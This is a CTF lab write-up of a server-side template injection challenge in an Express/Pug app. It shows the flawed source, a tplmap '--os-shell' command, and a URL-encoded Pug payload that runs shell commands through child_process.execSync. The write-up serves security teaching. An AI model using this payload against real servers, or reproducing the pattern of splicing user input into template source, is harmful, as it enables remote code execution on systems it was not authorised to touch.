Simple Web 0x22(Lab - Pug)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:8008

Source code

:::spoiler

```javascript
const express = require('express');
const pug = require('pug');

const app = express();

// User input is spliced into this template *source* before rendering (see below).
const template = `
h1 Hello %NAME%
form(method='GET' action='/')
  div
    label(for='nickname') Name:
    input#nickname(type='text', placeholder='Nickname' name='name')
    button(type='submit') Submit 
  a(href='/source') Source Code
`;

app.get('/', (req, res) => {
    const name = (req.query.name ?? 'Anonymous').toString();
    // Only '{' is rejected, so #{...} interpolation is blocked but nothing else is.
    if (name.includes('{')) return res.send('Nice try');
    // Vulnerable: name becomes part of the Pug source instead of a template local.
    let html = pug.render(template.replace('%NAME%', name));
    res.set('Content-Type', 'text/html');
    res.send(html);
});

app.get("/source", (_, res) => {
    res.sendFile(__filename);
});

app.listen(3000, () => console.log(':3000'));
```

:::

Exploit - tplmap

```sh
$ ./tplmap.py --engine pug --os-shell -u "http://h4ck3r.quest:8008/?name=bob"
```

- Tracing tplmap's requests with Wireshark shows what it injects. The challenge splices `name` into the template source with `template.replace('%NAME%', name)` and only rejects names containing `{`, which blocks `#{...}` interpolation but nothing else. A newline inside `name` ends the `h1` line, and a `=` at the start of the next line opens a Pug buffered-code line, which Pug evaluates as JavaScript when the template is rendered. After the replace, the template the server actually renders is:

  ```pug
  h1 Hello 
  = global.process.mainModule.require('child_process').execSync(Buffer('bHM=', 'base64').toString())
  form(method='GET' action='/')
    div
      label(for='nickname') Name:
      input#nickname(type='text', placeholder='Nickname' name='name')
      button(type='submit') Submit 
    a(href='/source') Source Code
  ```

- So the payload is a newline, an equals sign and the buffered-code line, URL-encoded:

  ```
  %0A%3D%20global.process.mainModule.require%28%27child_process%27%29.execSync%28Buffer%28%27bHM%3D%27%2C%20%27base64%27%29.toString%28%29%29
  ```

  which decodes to:

  ```pug
  = global.process.mainModule.require('child_process').execSync(Buffer('bHM=', 'base64').toString())
  ```

- `bHM=` is `ls` base64-encoded. tplmap base64-encodes each command so that its quotes, spaces and braces never appear in the template, and `--os-shell` sends a fresh request with a newly encoded command each time.

Reference

- A few things about SSTI injection (关于SSTI注入的二三事)
- [SSTI module injection] SSTI + Flask + Python, part 2: bypassing filters (【SSTI模块注入】SSTI+Flask+Python(下):绕过过滤)
- 0xdbe-appsec/ssti-express-pug
- Tplmap
- [Linux] Installing Node.js on Ubuntu ([Linux系統] Ubuntu 安裝 Node.js)